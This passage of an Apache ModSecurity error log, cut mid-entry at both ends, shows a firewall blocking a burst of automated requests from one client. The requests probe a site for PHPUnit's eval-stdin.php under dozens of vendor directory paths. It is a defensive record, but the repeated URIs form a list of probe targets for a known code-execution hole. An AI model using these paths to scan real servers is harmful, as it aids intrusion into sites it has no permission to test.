"960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPQXNvnD7WSFYwghj1QAAAM0"] [Thu Mar 30 12:05:01.055241 2023] [:error] [pid 8935:tid 140295794497280] [client 5.161.102.105:38256] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPWQ0QQSV-J3o6GozKQAAAFg"] [Thu Mar 30 12:05:01.086268 2023] [:error] [pid 8935:tid 140295911995136] [client 5.161.102.105:38258] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/lib/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPWQ0QQSV-J3o6GozKgAAAEo"] [Thu Mar 30 12:05:01.111065 2023] [:error] [pid 9378:tid 140295920387840] [client 5.161.102.105:38260] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPQXNvnD7WSFYwghj1gAAAMk"] [Thu Mar 30 12:05:01.134157 2023] [:error] [pid 9378:tid 140295861638912] [client 5.161.102.105:38262] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPQXNvnD7WSFYwghj1wAAANA"] [Thu Mar 30 12:05:01.160017 2023] [:error] [pid 8935:tid 140296055654144] [client 5.161.102.105:38264] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPWQ0QQSV-J3o6GozKwAAAEE"] [Thu Mar 30 12:05:01.193060 2023] [:error] [pid 9378:tid 140295794497280] [client 5.161.102.105:38266] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPQXNvnD7WSFYwghj2AAAANg"] [Thu Mar 30 12:05:01.229148 2023] [:error] [pid 8935:tid 140295802889984] [client 5.161.102.105:38268] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/test/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPWQ0QQSV-J3o6GozLAAAAFc"] [Thu Mar 30 12:05:01.288237 2023] [:error] [pid 9378:tid 140295953958656] [client 5.161.102.105:38270] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/backup/vendor/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPQXNvnD7WSFYwghj2QAAAMU"] [Thu Mar 30 12:05:01.348502 2023] [:error] [pid 8935:tid 140295836460800] [client 5.161.102.105:38272] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/api/vendor/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPWQ0QQSV-J3o6GozLQAAAFM"] [Thu Mar 30 12:05:01.382669 2023] [:error] [pid 8936:tid 140295962351360] [client 5.161.102.105:38274] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/test/vendor/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPdT1kWaQLjv80FSO_wAAAIQ"] [Thu Mar 30 12:05:01.422766 2023] [:error] [pid 8936:tid 140295828068096] [client 5.161.102.105:38276] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/test/laravel/vendor/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPdT1kWaQLjv80FSPAAAAAJQ"] [Thu Mar 30 12:05:01.443391 2023] [:error] [pid 9378:tid 140295878424320] [client 5.161.102.105:38278] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/testing/vendor/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPQXNvnD7WSFYwghj2gAAAM4"] [Thu Mar 30 12:05:01.477074 2023] [:error] [pid 9378:tid 140296055654144] [client 5.161.102.105:38280] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/testing/laravel/vendor/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPQXNvnD7WSFYwghj2wAAAME"] [Thu Mar 30 12:05:01.498423 2023] [:error] [pid 8934:tid 140295819675392] [client 5.161.102.105:38282] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPfga235zLtbfUvz-XAAAABU"] [Thu Mar 30 12:05:01.518960 2023] [:error] [pid 9378:tid 140295962351360] [client 5.161.102.105:38284] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/testing/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPQXNvnD7WSFYwghj3AAAAMQ"] [Thu Mar 30 12:05:01.564855 2023] [:error] [pid 9378:tid 140295979136768] [client 5.161.102.105:38286] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/demo/laravel/vendor/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPQXNvnD7WSFYwghj3QAAAMI"] [Thu Mar 30 12:05:01.590871 2023] [:error] [pid 9378:tid 140295811282688] [client 5.161.102.105:38288] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPQXNvnD7WSFYwghj3gAAANY"] [Thu Mar 30 12:05:01.657541 2023] [:error] [pid 8936:tid 140295836460800] [client 5.161.102.105:38290] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/demo/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPdT1kWaQLjv80FSPAQAAAJM"] [Thu Mar 30 12:05:01.713230 2023] [:error] [pid 9378:tid 140295903602432] [client 5.161.102.105:38292] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/dev/laravel/vendor/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPQXNvnD7WSFYwghj3wAAAMs"] [Thu Mar 30 12:05:01.738576 2023] [:error] [pid 9378:tid 140295895209728] [client 5.161.102.105:38294] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/dev/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPQXNvnD7WSFYwghj4AAAAMw"] [Thu Mar 30 12:05:01.810145 2023] [:error] [pid 8936:tid 140295861638912] [client 5.161.102.105:38296] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/dev/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPdT1kWaQLjv80FSPAgAAAJA"] [Thu Mar 30 12:05:01.845053 2023] [:error] [pid 9378:tid 140295911995136] [client 5.161.102.105:38298] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/store/laravel/vendor/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPQXNvnD7WSFYwghj4QAAAMo"] [Thu Mar 30 12:05:01.882822 2023] [:error] [pid 9378:tid 140295853246208] [client 5.161.102.105:38300] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/store/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPQXNvnD7WSFYwghj4gAAANE"] [Thu Mar 30 12:05:01.906117 2023] [:error] [pid 9378:tid 140295802889984] [client 5.161.102.105:38302] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/store/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPQXNvnD7WSFYwghj4wAAANc"] [Thu Mar 30 12:05:01.994574 2023] [:error] [pid 8936:tid 140295802889984] [client 5.161.102.105:38304] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/app/laravel/vendor/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPdT1kWaQLjv80FSPAwAAAJc"] [Thu Mar 30 12:05:02.018159 2023] [:error] [pid 8934:tid 140295928780544] [client 5.161.102.105:38306] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPvga235zLtbfUvz-XQAAAAg"] [Thu Mar 30 12:05:02.046213 2023] [:error] [pid 9378:tid 140295886817024] [client 5.161.102.105:38308] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/app/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPgXNvnD7WSFYwghj5AAAAM0"] [Thu Mar 30 12:05:02.120588 2023] [:error] [pid 8934:tid 140295802889984] [client 5.161.102.105:38310] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/core/laravel/vendor/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPvga235zLtbfUvz-XgAAABc"] [Thu Mar 30 12:05:02.190446 2023] [:error] [pid 9378:tid 140295970744064] [client 5.161.102.105:38312] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/core/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPgXNvnD7WSFYwghj5QAAAMM"] [Thu Mar 30 12:05:02.225822 2023] [:error] [pid 9378:tid 140295861638912] [client 5.161.102.105:38314] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/core/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPgXNvnD7WSFYwghj5gAAANA"] [Thu Mar 30 12:05:02.278336 2023] [:error] [pid 9378:tid 140295953958656] [client 5.161.102.105:38316] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/ticket/laravel/vendor/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPgXNvnD7WSFYwghj5wAAAMU"] [Thu Mar 30 12:05:02.368740 2023] [:error] [pid 8935:tid 140295828068096] [client 5.161.102.105:38318] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/ticket/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPmQ0QQSV-J3o6GozLgAAAFQ"] [Thu Mar 30 12:05:02.387460 2023] [:error] [pid 8936:tid 140295819675392] [client 5.161.102.105:38320] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/mantis/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPtT1kWaQLjv80FSPBAAAAJU"] [Thu Mar 30 12:05:02.409775 2023] [:error] [pid 8936:tid 140295811282688] [client 5.161.102.105:38322] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/mantisbt/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPtT1kWaQLjv80FSPBQAAAJY"] [Thu Mar 30 12:05:02.478077 2023] [:error] [pid 8936:tid 140295970744064] [client 5.161.102.105:38324] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/2018/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBPtT1kWaQLjv80FSPBgAAAIM"] [Thu Mar 30 12:05:02.512480 2023] [:error] [pid 9378:tid 140295870031616] [client 5.161.102.105:38326] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri 